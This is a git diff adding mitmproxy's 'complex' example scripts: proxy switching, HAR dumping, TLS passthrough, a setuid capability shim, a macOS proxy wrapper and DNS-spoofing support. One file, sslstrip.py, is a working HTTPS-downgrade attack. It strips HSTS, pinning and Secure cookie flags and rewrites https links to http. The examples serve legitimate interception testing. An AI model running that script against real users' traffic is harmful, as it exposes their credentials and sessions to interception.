diff options
Diffstat (limited to 'examples/complex')
-rw-r--r-- | examples/complex/README.md | 19 | ||||
-rw-r--r-- | examples/complex/change_upstream_proxy.py | 24 | ||||
-rw-r--r-- | examples/complex/dns_spoofing.py | 49 | ||||
-rw-r--r-- | examples/complex/dup_and_replay.py | 7 | ||||
-rw-r--r-- | examples/complex/flowbasic.py | 43 | ||||
-rw-r--r-- | examples/complex/full_transparency_shim.c | 87 | ||||
-rw-r--r-- | examples/complex/har_dump.py | 219 | ||||
-rw-r--r-- | examples/complex/mitmproxywrapper.py | 165 | ||||
-rw-r--r-- | examples/complex/nonblocking.py | 11 | ||||
-rw-r--r-- | examples/complex/remote_debug.py | 19 | ||||
-rw-r--r-- | examples/complex/sslstrip.py | 57 | ||||
-rw-r--r-- | examples/complex/stickycookies | 42 | ||||
-rw-r--r-- | examples/complex/stream.py | 6 | ||||
-rw-r--r-- | examples/complex/stream_modify.py | 20 | ||||
-rw-r--r-- | examples/complex/tcp_message.py | 27 | ||||
-rw-r--r-- | examples/complex/tls_passthrough.py | 140 |
16 files changed, 935 insertions, 0 deletions
diff --git a/examples/complex/README.md b/examples/complex/README.md new file mode 100644 index 00000000..d3b2e77a --- /dev/null +++ b/examples/complex/README.md @@ -0,0 +1,19 @@ +## Complex Examples + +| Filename | Description | +|:-------------------------|:----------------------------------------------------------------------------------------------| +| change_upstream_proxy.py | Dynamically change the upstream proxy. | +| dns_spoofing.py | Use mitmproxy in a DNS spoofing scenario. | +| dup_and_replay.py | Duplicates each request, changes it, and then replays the modified request. | +| flowbasic.py | Basic use of mitmproxy's FlowMaster directly. | +| full_transparency_shim.c | Setuid wrapper that can be used to run mitmproxy in full transparency mode, as a normal user. | +| har_dump.py | Dump flows as HAR files. | +| mitmproxywrapper.py | Bracket mitmproxy run with proxy enable/disable on OS X | +| nonblocking.py | Demonstrate parallel processing with a blocking script | +| remote_debug.py | This script enables remote debugging of the mitmproxy _UI_ with PyCharm. | +| sslstrip.py | sslstrip-like funtionality implemented with mitmproxy | +| stickycookies | An advanced example of using mitmproxy's FlowMaster directly. | +| stream | Enable streaming for all responses. | +| stream_modify.py | Modify a streamed response body. | +| tcp_message.py | Modify a raw TCP connection | +| tls_passthrough.py | Use conditional TLS interception based on a user-defined strategy. |
\ No newline at end of file diff --git a/examples/complex/change_upstream_proxy.py b/examples/complex/change_upstream_proxy.py new file mode 100644 index 00000000..49d5379f --- /dev/null +++ b/examples/complex/change_upstream_proxy.py @@ -0,0 +1,24 @@ +# This scripts demonstrates how mitmproxy can switch to a second/different upstream proxy +# in upstream proxy mode. +# +# Usage: mitmdump -U http://default-upstream-proxy.local:8080/ -s change_upstream_proxy.py +# +# If you want to change the target server, you should modify flow.request.host and flow.request.port + + +def proxy_address(flow): + # Poor man's loadbalancing: route every second domain through the alternative proxy. + if hash(flow.request.host) % 2 == 1: + return ("localhost", 8082) + else: + return ("localhost", 8081) + + +def request(flow): + if flow.request.method == "CONNECT": + # If the decision is done by domain, one could also modify the server address here. + # We do it after CONNECT here to have the request data available as well. + return + address = proxy_address(flow) + if flow.live: + flow.live.change_upstream_proxy_server(address) diff --git a/examples/complex/dns_spoofing.py b/examples/complex/dns_spoofing.py new file mode 100644 index 00000000..c020047f --- /dev/null +++ b/examples/complex/dns_spoofing.py @@ -0,0 +1,49 @@ +""" +This inline scripts makes it possible to use mitmproxy in scenarios where IP spoofing has been used to redirect +connections to mitmproxy. The way this works is that we rely on either the TLS Server Name Indication (SNI) or the +Host header of the HTTP request. +Of course, this is not foolproof - if an HTTPS connection comes without SNI, we don't +know the actual target and cannot construct a certificate that looks valid. +Similarly, if there's no Host header or a spoofed Host header, we're out of luck as well. +Using transparent mode is the better option most of the time. + +Usage: + mitmproxy + -p 443 + -s dns_spoofing.py + # Used as the target location if neither SNI nor host header are present. + -R http://example.com/ + mitmdump + -p 80 + -R http://localhost:443/ + + (Setting up a single proxy instance and using iptables to redirect to it + works as well) +""" +import re + +# This regex extracts splits the host header into host and port. +# Handles the edge case of IPv6 addresses containing colons. +# https://bugzilla.mozilla.org/show_bug.cgi?id=45891 +parse_host_header = re.compile(r"^(?P<host>[^:]+|\[.+\])(?::(?P<port>\d+))?$") + + +def request(flow): + if flow.client_conn.ssl_established: + flow.request.scheme = "https" + sni = flow.client_conn.connection.get_servername() + port = 443 + else: + flow.request.scheme = "http" + sni = None + port = 80 + + host_header = flow.request.pretty_host + m = parse_host_header.match(host_header) + if m: + host_header = m.group("host").strip("[]") + if m.group("port"): + port = int(m.group("port")) + + flow.request.host = sni or host_header + flow.request.port = port diff --git a/examples/complex/dup_and_replay.py b/examples/complex/dup_and_replay.py new file mode 100644 index 00000000..bf7c2a4e --- /dev/null +++ b/examples/complex/dup_and_replay.py @@ -0,0 +1,7 @@ +from mitmproxy import ctx + + +def request(flow): + f = ctx.master.state.duplicate_flow(flow) + f.request.path = "/changed" + ctx.master.replay_request(f, block=True) diff --git a/examples/complex/flowbasic.py b/examples/complex/flowbasic.py new file mode 100644 index 00000000..25b0b1a9 --- /dev/null +++ b/examples/complex/flowbasic.py @@ -0,0 +1,43 @@ +#!/usr/bin/env python +""" + This example shows how to build a proxy based on mitmproxy's Flow + primitives. + + Heads Up: In the majority of cases, you want to use inline scripts. + + Note that request and response messages are not automatically replied to, + so we need to implement handlers to do this. +""" +from mitmproxy import controller, options, master +from mitmproxy.proxy import ProxyServer, ProxyConfig + + +class MyMaster(master.Master): + def run(self): + try: + master.Master.run(self) + except KeyboardInterrupt: + self.shutdown() + + @controller.handler + def request(self, f): + print("request", f) + + @controller.handler + def response(self, f): + print("response", f) + + @controller.handler + def error(self, f): + print("error", f) + + @controller.handler + def log(self, l): + print("log", l.msg) + + +opts = options.Options(cadir="~/.mitmproxy/") +config = ProxyConfig(opts) +server = ProxyServer(config) +m = MyMaster(opts, server) +m.run() diff --git a/examples/complex/full_transparency_shim.c b/examples/complex/full_transparency_shim.c new file mode 100644 index 00000000..923eea76 --- /dev/null +++ b/examples/complex/full_transparency_shim.c @@ -0,0 +1,87 @@ +#define _GNU_SOURCE +#include <stdio.h> +#include <string.h> +#include <sys/prctl.h> +#include <sys/types.h> +#include <sys/capability.h> +#include <unistd.h> +#include <errno.h> + +/* This setuid wrapper can be used to run mitmproxy in full transparency mode, as a normal user. + * It will set the required capabilities (CAP_NET_RAW), drop privileges, and will then run argv[1] + * with the same capabilities. + * + * It can be compiled as follows: + * gcc examples/mitmproxy_shim.c -o mitmproxy_shim -lcap +*/ + +int set_caps(cap_t cap_struct, cap_value_t *cap_list, size_t bufsize) { + int cap_count = bufsize / sizeof(cap_list[0]); + + if (cap_set_flag(cap_struct, CAP_PERMITTED, cap_count, cap_list, CAP_SET) || + cap_set_flag(cap_struct, CAP_EFFECTIVE, cap_count, cap_list, CAP_SET) || + cap_set_flag(cap_struct, CAP_INHERITABLE, cap_count, cap_list, CAP_SET)) { + if (cap_count < 2) { + fprintf(stderr, "Cannot manipulate capability data structure as user: %s.\n", strerror(errno)); + } else { + fprintf(stderr, "Cannot manipulate capability data structure as root: %s.\n", strerror(errno)); + } + return -1; + } + + if (cap_count < 2) { + if (prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, CAP_NET_RAW, 0, 0)) { + fprintf(stderr, "Failed to add CAP_NET_RAW to the ambient set: %s.\n", strerror(errno)); + return -2; + } + } + + if (cap_set_proc(cap_struct)) { + if (cap_count < 2) { + fprintf(stderr, "Cannot set capabilities as user: %s.\n", strerror(errno)); + } else { + fprintf(stderr, "Cannot set capabilities as root: %s.\n", strerror(errno)); + } + return -3; + } + + if (cap_count > 1) { + if (prctl(PR_SET_KEEPCAPS, 1L)) { + fprintf(stderr, "Cannot keep capabilities after dropping privileges: %s.\n", strerror(errno)); + return -4; + } + if (cap_clear(cap_struct)) { + fprintf(stderr, "Cannot clear capability data structure: %s.\n", strerror(errno)); + return -5; + } + } +} + +int main(int argc, char **argv, char **envp) { + cap_t cap_struct = cap_init(); + cap_value_t root_caps[2] = { CAP_NET_RAW, CAP_SETUID }; + cap_value_t user_caps[1] = { CAP_NET_RAW }; + uid_t user = getuid(); + int res; + + if (setresuid(0, 0, 0)) { + fprintf(stderr, "Cannot switch to root: %s.\n", strerror(errno)); + return 1; + } + + if (res = set_caps(cap_struct, root_caps, sizeof(root_caps))) + return res; + + if (setresuid(user, user, user)) { + fprintf(stderr, "Cannot drop root privileges: %s.\n", strerror(errno)); + return 2; + } + + if (res = set_caps(cap_struct, user_caps, sizeof(user_caps))) + return res; + + if (execve(argv[1], argv + 1, envp)) { + fprintf(stderr, "Failed to execute %s: %s\n", argv[1], strerror(errno)); + return 3; + } +} diff --git a/examples/complex/har_dump.py b/examples/complex/har_dump.py new file mode 100644 index 00000000..aeb154d2 --- /dev/null +++ b/examples/complex/har_dump.py @@ -0,0 +1,219 @@ +""" +This inline script can be used to dump flows as HAR files. +""" + + +import json +import sys +import base64 +import zlib + +from datetime import datetime +import pytz + +import mitmproxy + +from mitmproxy import version +from mitmproxy.utils import strutils +from mitmproxy.net.http import cookies + +HAR = {} + +# A list of server seen till now is maintained so we can avoid +# using 'connect' time for entries that use an existing connection. +SERVERS_SEEN = set() + + +def start(): + """ + Called once on script startup before any other events. + """ + if len(sys.argv) != 2: + raise ValueError( + 'Usage: -s "har_dump.py filename" ' + '(- will output to stdout, filenames ending with .zhar ' + 'will result in compressed har)' + ) + + HAR.update({ + "log": { + "version": "1.2", + "creator": { + "name": "mitmproxy har_dump", + "version": "0.1", + "comment": "mitmproxy version %s" % version.MITMPROXY + }, + "entries": [] + } + }) + + +def response(flow): + """ + Called when a server response has been received. + """ + + # -1 indicates that these values do not apply to current request + ssl_time = -1 + connect_time = -1 + + if flow.server_conn and flow.server_conn not in SERVERS_SEEN: + connect_time = (flow.server_conn.timestamp_tcp_setup - + flow.server_conn.timestamp_start) + + if flow.server_conn.timestamp_ssl_setup is not None: + ssl_time = (flow.server_conn.timestamp_ssl_setup - + flow.server_conn.timestamp_tcp_setup) + + SERVERS_SEEN.add(flow.server_conn) + + # Calculate raw timings from timestamps. DNS timings can not be calculated + # for lack of a way to measure it. The same goes for HAR blocked. + # mitmproxy will open a server connection as soon as it receives the host + # and port from the client connection. So, the time spent waiting is actually + # spent waiting between request.timestamp_end and response.timestamp_start + # thus it correlates to HAR wait instead. + timings_raw = { + 'send': flow.request.timestamp_end - flow.request.timestamp_start, + 'receive': flow.response.timestamp_end - flow.response.timestamp_start, + 'wait': flow.response.timestamp_start - flow.request.timestamp_end, + 'connect': connect_time, + 'ssl': ssl_time, + } + + # HAR timings are integers in ms, so we re-encode the raw timings to that format. + timings = dict([(k, int(1000 * v)) for k, v in timings_raw.items()]) + + # full_time is the sum of all timings. + # Timings set to -1 will be ignored as per spec. + full_time = sum(v for v in timings.values() if v > -1) + + started_date_time = format_datetime(datetime.utcfromtimestamp(flow.request.timestamp_start)) + + # Response body size and encoding + response_body_size = len(flow.response.raw_content) + response_body_decoded_size = len(flow.response.content) + response_body_compression = response_body_decoded_size - response_body_size + + entry = { + "startedDateTime": started_date_time, + "time": full_time, + "request": { + "method": flow.request.method, + "url": flow.request.url, + "httpVersion": flow.request.http_version, + "cookies": format_request_cookies(flow.request.cookies.fields), + "headers": name_value(flow.request.headers), + "queryString": name_value(flow.request.query or {}), + "headersSize": len(str(flow.request.headers)), + "bodySize": len(flow.request.content), + }, + "response": { + "status": flow.response.status_code, + "statusText": flow.response.reason, + "httpVersion": flow.response.http_version, + "cookies": format_response_cookies(flow.response.cookies.fields), + "headers": name_value(flow.response.headers), + "content": { + "size": response_body_size, + "compression": response_body_compression, + "mimeType": flow.response.headers.get('Content-Type', '') + }, + "redirectURL": flow.response.headers.get('Location', ''), + "headersSize": len(str(flow.response.headers)), + "bodySize": response_body_size, + }, + "cache": {}, + "timings": timings, + } + + # Store binary data as base64 + if strutils.is_mostly_bin(flow.response.content): + entry["response"]["content"]["text"] = base64.b64encode(flow.response.content).decode() + entry["response"]["content"]["encoding"] = "base64" + else: + entry["response"]["content"]["text"] = flow.response.get_text(strict=False) + + if flow.request.method in ["POST", "PUT", "PATCH"]: + params = [ + {"name": a.decode("utf8", "surrogateescape"), "value": b.decode("utf8", "surrogateescape")} + for a, b in flow.request.urlencoded_form.items(multi=True) + ] + entry["request"]["postData"] = { + "mimeType": flow.request.headers.get("Content-Type", ""), + "text": flow.request.get_text(strict=False), + "params": params + } + + if flow.server_conn.connected(): + entry["serverIPAddress"] = str(flow.server_conn.ip_address.address[0]) + + HAR["log"]["entries"].append(entry) + + +def done(): + """ + Called once on script shutdown, after any other events. + """ + dump_file = sys.argv[1] + + json_dump = json.dumps(HAR, indent=2) # type: str + + if dump_file == '-': + mitmproxy.ctx.log(json_dump) + else: + raw = json_dump.encode() # type: bytes + if dump_file.endswith('.zhar'): + raw = zlib.compress(raw, 9) + + with open(dump_file, "wb") as f: + f.write(raw) + + mitmproxy.ctx.log("HAR dump finished (wrote %s bytes to file)" % len(json_dump)) + + +def format_datetime(dt): + return dt.replace(tzinfo=pytz.timezone("UTC")).isoformat() + + +def format_cookies(cookie_list): + rv = [] + + for name, value, attrs in cookie_list: + cookie_har = { + "name": name, + "value": value, + } + + # HAR only needs some attributes + for key in ["path", "domain", "comment"]: + if key in attrs: + cookie_har[key] = attrs[key] + + # These keys need to be boolean! + for key in ["httpOnly", "secure"]: + cookie_har[key] = bool(key in attrs) + + # Expiration time needs to be formatted + expire_ts = cookies.get_expiration_ts(attrs) + if expire_ts is not None: + cookie_har["expires"] = format_datetime(datetime.fromtimestamp(expire_ts)) + + rv.append(cookie_har) + + return rv + + +def format_request_cookies(fields): + return format_cookies(cookies.group_cookies(fields)) + + +def format_response_cookies(fields): + return format_cookies((c[0], c[1].value, c[1].attrs) for c in fields) + + +def name_value(obj): + """ + Convert (key, value) pairs to HAR format. + """ + return [{"name": k, "value": v} for k, v in obj.items()] diff --git a/examples/complex/mitmproxywrapper.py b/examples/complex/mitmproxywrapper.py new file mode 100644 index 00000000..eade0fe2 --- /dev/null +++ b/examples/complex/mitmproxywrapper.py @@ -0,0 +1,165 @@ +#!/usr/bin/env python +# +# Helper tool to enable/disable OS X proxy and wrap mitmproxy +# +# Get usage information with: +# +# mitmproxywrapper.py -h +# + +import subprocess +import re +import argparse +import contextlib +import os +import sys + + +class Wrapper: + def __init__(self, port, extra_arguments=None): + self.port = port + self.extra_arguments = extra_arguments + + def run_networksetup_command(self, *arguments): + return subprocess.check_output( + ['sudo', 'networksetup'] + list(arguments)) + + def proxy_state_for_service(self, service): + state = self.run_networksetup_command( + '-getwebproxy', + service).splitlines() + return dict([re.findall(r'([^:]+): (.*)', line)[0] for line in state]) + + def enable_proxy_for_service(self, service): + print('Enabling proxy on {}...'.format(service)) + for subcommand in ['-setwebproxy', '-setsecurewebproxy']: + self.run_networksetup_command( + subcommand, service, '127.0.0.1', str( + self.port)) + + def disable_proxy_for_service(self, service): + print('Disabling proxy on {}...'.format(service)) + for subcommand in ['-setwebproxystate', '-setsecurewebproxystate']: + self.run_networksetup_command(subcommand, service, 'Off') + + def interface_name_to_service_name_map(self): + order = self.run_networksetup_command('-listnetworkserviceorder') + mapping = re.findall( + r'\(\d+\)\s(.*)$\n\(.*Device: (.+)\)$', + order, + re.MULTILINE) + return dict([(b, a) for (a, b) in mapping]) + + def run_command_with_input(self, command, input): + popen = subprocess.Popen( + command, + stdin=subprocess.PIPE, + stdout=subprocess.PIPE) + (stdout, stderr) = popen.communicate(input) + return stdout + + def primary_interace_name(self): + scutil_script = 'get State:/Network/Global/IPv4\nd.show\n' + stdout = self.run_command_with_input('/usr/sbin/scutil', scutil_script) + interface, = re.findall(r'PrimaryInterface\s*:\s*(.+)', stdout) + return interface + + def primary_service_name(self): + return self.interface_name_to_service_name_map()[ + self.primary_interace_name()] + + def proxy_enabled_for_service(self, service): + return self.proxy_state_for_service(service)['Enabled'] == 'Yes' + + def toggle_proxy(self): + new_state = not self.proxy_enabled_for_service( + self.primary_service_name()) + for service_name in self.connected_service_names(): + if self.proxy_enabled_for_service(service_name) and not new_state: + self.disable_proxy_for_service(service_name) + elif not self.proxy_enabled_for_service(service_name) and new_state: + self.enable_proxy_for_service(service_name) + + def connected_service_names(self): + scutil_script = 'list\n' + stdout = self.run_command_with_input('/usr/sbin/scutil', scutil_script) + service_ids = re.findall(r'State:/Network/Service/(.+)/IPv4', stdout) + + service_names = [] + for service_id in service_ids: + scutil_script = 'show Setup:/Network/Service/{}\n'.format( + service_id) + stdout = self.run_command_with_input( + '/usr/sbin/scutil', + scutil_script) + service_name, = re.findall(r'UserDefinedName\s*:\s*(.+)', stdout) + service_names.append(service_name) + + return service_names + + def wrap_mitmproxy(self): + with self.wrap_proxy(): + cmd = ['mitmproxy', '-p', str(self.port)] + if self.extra_arguments: + cmd.extend(self.extra_arguments) + subprocess.check_call(cmd) + + def wrap_honeyproxy(self): + with self.wrap_proxy(): + popen = subprocess.Popen('honeyproxy.sh') + try: + popen.wait() + except KeyboardInterrupt: + popen.terminate() + + @contextlib.contextmanager + def wrap_proxy(self): + connected_service_names = self.connected_service_names() + for service_name in connected_service_names: + if not self.proxy_enabled_for_service(service_name): + self.enable_proxy_for_service(service_name) + + yield + + for service_name in connected_service_names: + if self.proxy_enabled_for_service(service_name): + self.disable_proxy_for_service(service_name) + + @classmethod + def ensure_superuser(cls): + if os.getuid() != 0: + print('Relaunching with sudo...') + os.execv('/usr/bin/sudo', ['/usr/bin/sudo'] + sys.argv) + + @classmethod + def main(cls): + parser = argparse.ArgumentParser( + description='Helper tool for OS X proxy configuration and mitmproxy.', + epilog='Any additional arguments will be passed on unchanged to mitmproxy.') + parser.add_argument( + '-t', + '--toggle', + action='store_true', + help='just toggle the proxy configuration') + # parser.add_argument('--honeyproxy', action='store_true', help='run honeyproxy instead of mitmproxy') + parser.add_argument( + '-p', + '--port', + type=int, + help='override the default port of 8080', + default=8080) + args, extra_arguments = parser.parse_known_args() + + wrapper = cls(port=args.port, extra_arguments=extra_arguments) + + if args.toggle: + wrapper.toggle_proxy() + # elif args.honeyproxy: + # wrapper.wrap_honeyproxy() + else: + wrapper.wrap_mitmproxy() + + +if __name__ == '__main__': + Wrapper.ensure_superuser() + Wrapper.main() diff --git a/examples/complex/nonblocking.py b/examples/complex/nonblocking.py new file mode 100644 index 00000000..264a1fdb --- /dev/null +++ b/examples/complex/nonblocking.py @@ -0,0 +1,11 @@ +import time + +from mitmproxy.script import concurrent + + +@concurrent # Remove this and see what happens +def request(flow): + # You don't want to use mitmproxy.ctx from a different thread + print("handle request: %s%s" % (flow.request.host, flow.request.path)) + time.sleep(5) + print("start request: %s%s" % (flow.request.host, flow.request.path)) diff --git a/examples/complex/remote_debug.py b/examples/complex/remote_debug.py new file mode 100644 index 00000000..fb864f78 --- /dev/null +++ b/examples/complex/remote_debug.py @@ -0,0 +1,19 @@ +""" +This script enables remote debugging of the mitmproxy *UI* with PyCharm. +For general debugging purposes, it is easier to just debug mitmdump within PyCharm. + +Usage: + - pip install pydevd on the mitmproxy machine + - Open the Run/Debug Configuration dialog box in PyCharm, and select the Python Remote Debug configuration type. + - Debugging works in the way that mitmproxy connects to the debug server on startup. + Specify host and port that mitmproxy can use to reach your PyCharm instance on startup. + - Adjust this inline script accordingly. + - Start debug server in PyCharm + - Set breakpoints + - Start mitmproxy -s remote_debug.py +""" + + +def start(): + import pydevd + pydevd.settrace("localhost", port=5678, stdoutToServer=True, stderrToServer=True) diff --git a/examples/complex/sslstrip.py b/examples/complex/sslstrip.py new file mode 100644 index 00000000..2f60c8b9 --- /dev/null +++ b/examples/complex/sslstrip.py @@ -0,0 +1,57 @@ +""" +This script implements an sslstrip-like attack based on mitmproxy. +https://moxie.org/software/sslstrip/ +""" +import re +import urllib + +# set of SSL/TLS capable hosts +secure_hosts = set() + + +def request(flow): + flow.request.headers.pop('If-Modified-Since', None) + flow.request.headers.pop('Cache-Control', None) + + # do not force https redirection + flow.request.headers.pop('Upgrade-Insecure-Requests', None) + + # proxy connections to SSL-enabled hosts + if flow.request.pretty_host in secure_hosts: + flow.request.scheme = 'https' + flow.request.port = 443 + + # We need to update the request destination to whatever is specified in the host header: + # Having no TLS Server Name Indication from the client and just an IP address as request.host + # in transparent mode, TLS server name certificate validation would fail. + flow.request.host = flow.request.pretty_host + + +def response(flow): + flow.response.headers.pop('Strict-Transport-Security', None) + flow.response.headers.pop('Public-Key-Pins', None) + + # strip links in response body + flow.response.content = flow.response.content.replace(b'https://', b'http://') + + # strip meta tag upgrade-insecure-requests in response body + csp_meta_tag_pattern = b'<meta.*http-equiv=["\']Content-Security-Policy[\'"].*upgrade-insecure-requests.*?>' + flow.response.content = re.sub(csp_meta_tag_pattern, b'', flow.response.content, flags=re.IGNORECASE) + + # strip links in 'Location' header + if flow.response.headers.get('Location', '').startswith('https://'): + location = flow.response.headers['Location'] + hostname = urllib.parse.urlparse(location).hostname + if hostname: + secure_hosts.add(hostname) + flow.response.headers['Location'] = location.replace('https://', 'http://', 1) + + # strip upgrade-insecure-requests in Content-Security-Policy header + if re.search('upgrade-insecure-requests', flow.response.headers.get('Content-Security-Policy', ''), flags=re.IGNORECASE): + csp = flow.response.headers['Content-Security-Policy'] + flow.response.headers['Content-Security-Policy'] = re.sub('upgrade-insecure-requests[;\s]*', '', csp, flags=re.IGNORECASE) + + # strip secure flag from 'Set-Cookie' headers + cookies = flow.response.headers.get_all('Set-Cookie') + cookies = [re.sub(r';\s*secure\s*', '', s) for s in cookies] + flow.response.headers.set_all('Set-Cookie', cookies) diff --git a/examples/complex/stickycookies b/examples/complex/stickycookies new file mode 100644 index 00000000..4631fa73 --- /dev/null +++ b/examples/complex/stickycookies @@ -0,0 +1,42 @@ +#!/usr/bin/env python +""" +This example builds on mitmproxy's base proxying infrastructure to +implement functionality similar to the "sticky cookies" option. + +Heads Up: In the majority of cases, you want to use inline scripts. +""" +import os +from mitmproxy import controller, proxy, master +from mitmproxy.proxy.server import ProxyServer + + +class StickyMaster(master.Master): + def __init__(self, server): + master.Master.__init__(self, server) + self.stickyhosts = {} + + def run(self): + try: + return master.Master.run(self) + except KeyboardInterrupt: + self.shutdown() + + @controller.handler + def request(self, flow): + hid = (flow.request.host, flow.request.port) + if "cookie" in flow.request.headers: + self.stickyhosts[hid] = flow.request.headers.get_all("cookie") + elif hid in self.stickyhosts: + flow.request.headers.set_all("cookie", self.stickyhosts[hid]) + + @controller.handler + def response(self, flow): + hid = (flow.request.host, flow.request.port) + if "set-cookie" in flow.response.headers: + self.stickyhosts[hid] = flow.response.headers.get_all("set-cookie") + + +config = proxy.ProxyConfig(port=8080) +server = ProxyServer(config) +m = StickyMaster(server) +m.run() diff --git a/examples/complex/stream.py b/examples/complex/stream.py new file mode 100644 index 00000000..1993cf7f --- /dev/null +++ b/examples/complex/stream.py @@ -0,0 +1,6 @@ +def responseheaders(flow): + """ + Enables streaming for all responses. + This is equivalent to passing `--stream 0` to mitmproxy. + """ + flow.response.stream = True diff --git a/examples/complex/stream_modify.py b/examples/complex/stream_modify.py new file mode 100644 index 00000000..5e5da95b --- /dev/null +++ b/examples/complex/stream_modify.py @@ -0,0 +1,20 @@ +""" +This inline script modifies a streamed response. +If you do not need streaming, see the modify_response_body example. +Be aware that content replacement isn't trivial: + - If the transfer encoding isn't chunked, you cannot simply change the content length. + - If you want to replace all occurences of "foobar", make sure to catch the cases + where one chunk ends with [...]foo" and the next starts with "bar[...]. +""" + + +def modify(chunks): + """ + chunks is a generator that can be used to iterate over all chunks. + """ + for chunk in chunks: + yield chunk.replace("foo", "bar") + + +def responseheaders(flow): + flow.response.stream = modify diff --git a/examples/complex/tcp_message.py b/examples/complex/tcp_message.py new file mode 100644 index 00000000..d7c9c42e --- /dev/null +++ b/examples/complex/tcp_message.py @@ -0,0 +1,27 @@ +""" +tcp_message Inline Script Hook API Demonstration +------------------------------------------------ + +* modifies packets containing "foo" to "bar" +* prints various details for each packet. + +example cmdline invocation: +mitmdump -T --host --tcp ".*" -q -s examples/tcp_message.py +""" +from mitmproxy.utils import strutils + + +def tcp_message(tcp_msg): + modified_msg = tcp_msg.message.replace("foo", "bar") + + is_modified = False if modified_msg == tcp_msg.message else True + tcp_msg.message = modified_msg + + print( + "[tcp_message{}] from {} {} to {} {}:\r\n{}".format( + " (modified)" if is_modified else "", + "client" if tcp_msg.sender == tcp_msg.client_conn else "server", + tcp_msg.sender.address, + "server" if tcp_msg.receiver == tcp_msg.server_conn else "client", + tcp_msg.receiver.address, strutils.bytes_to_escaped_str(tcp_msg.message)) + ) diff --git a/examples/complex/tls_passthrough.py b/examples/complex/tls_passthrough.py new file mode 100644 index 00000000..40c1051d --- /dev/null +++ b/examples/complex/tls_passthrough.py @@ -0,0 +1,140 @@ +""" +This inline script allows conditional TLS Interception based +on a user-defined strategy. + +Example: + + > mitmdump -s tls_passthrough.py + + 1. curl --proxy http://localhost:8080 https://example.com --insecure + // works - we'll also see the contents in mitmproxy + + 2. curl --proxy http://localhost:8080 https://example.com --insecure + // still works - we'll also see the contents in mitmproxy + + 3. curl --proxy http://localhost:8080 https://example.com + // fails with a certificate error, which we will also see in mitmproxy + + 4. curl --proxy http://localhost:8080 https://example.com + // works again, but mitmproxy does not intercept and we do *not* see the contents + +Authors: Maximilian Hils, Matthew Tuusberg +""" +import collections +import random + +import sys +from enum import Enum + +import mitmproxy +from mitmproxy.exceptions import TlsProtocolException +from mitmproxy.proxy.protocol import TlsLayer, RawTCPLayer + + +class InterceptionResult(Enum): + success = True + failure = False + skipped = None + + +class _TlsStrategy: + """ + Abstract base class for interception strategies. + """ + + def __init__(self): + # A server_address -> interception results mapping + self.history = collections.defaultdict(lambda: collections.deque(maxlen=200)) + + def should_intercept(self, server_address): + """ + Returns: + True, if we should attempt to intercept the connection. + False, if we want to employ pass-through instead. + """ + raise NotImplementedError() + + def record_success(self, server_address): + self.history[server_address].append(InterceptionResult.success) + + def record_failure(self, server_address): + self.history[server_address].append(InterceptionResult.failure) + + def record_skipped(self, server_address): + self.history[server_address].append(InterceptionResult.skipped) + + +class ConservativeStrategy(_TlsStrategy): + """ + Conservative Interception Strategy - only intercept if there haven't been any failed attempts + in the history. + """ + + def should_intercept(self, server_address): + if InterceptionResult.failure in self.history[server_address]: + return False + return True + + +class ProbabilisticStrategy(_TlsStrategy): + """ + Fixed probability that we intercept a given connection. + """ + + def __init__(self, p): + self.p = p + super(ProbabilisticStrategy, self).__init__() + + def should_intercept(self, server_address): + return random.uniform(0, 1) < self.p + + +class TlsFeedback(TlsLayer): + """ + Monkey-patch _establish_tls_with_client to get feedback if TLS could be established + successfully on the client connection (which may fail due to cert pinning). + """ + + def _establish_tls_with_client(self): + server_address = self.server_conn.address + + try: + super(TlsFeedback, self)._establish_tls_with_client() + except TlsProtocolException as e: + tls_strategy.record_failure(server_address) + raise e + else: + tls_strategy.record_success(server_address) + + +# inline script hooks below. + +tls_strategy = None + + +def start(): + global tls_strategy + if len(sys.argv) == 2: + tls_strategy = ProbabilisticStrategy(float(sys.argv[1])) + else: + tls_strategy = ConservativeStrategy() + + +def next_layer(next_layer): + """ + This hook does the actual magic - if the next layer is planned to be a TLS layer, + we check if we want to enter pass-through mode instead. + """ + if isinstance(next_layer, TlsLayer) and next_layer._client_tls: + server_address = next_layer.server_conn.address + + if tls_strategy.should_intercept(server_address): + # We try to intercept. + # Monkey-Patch the layer to get feedback from the TLSLayer if interception worked. + next_layer.__class__ = TlsFeedback + else: + # We don't intercept - reply with a pass-through layer and add a "skipped" entry. + mitmproxy.ctx.log("TLS passthrough for %s" % repr(next_layer.server_conn.address), "info") + next_layer_replacement = RawTCPLayer(next_layer.ctx, ignore=True) + next_layer.reply.send(next_layer_replacement) + tls_strategy.record_skipped(server_address) |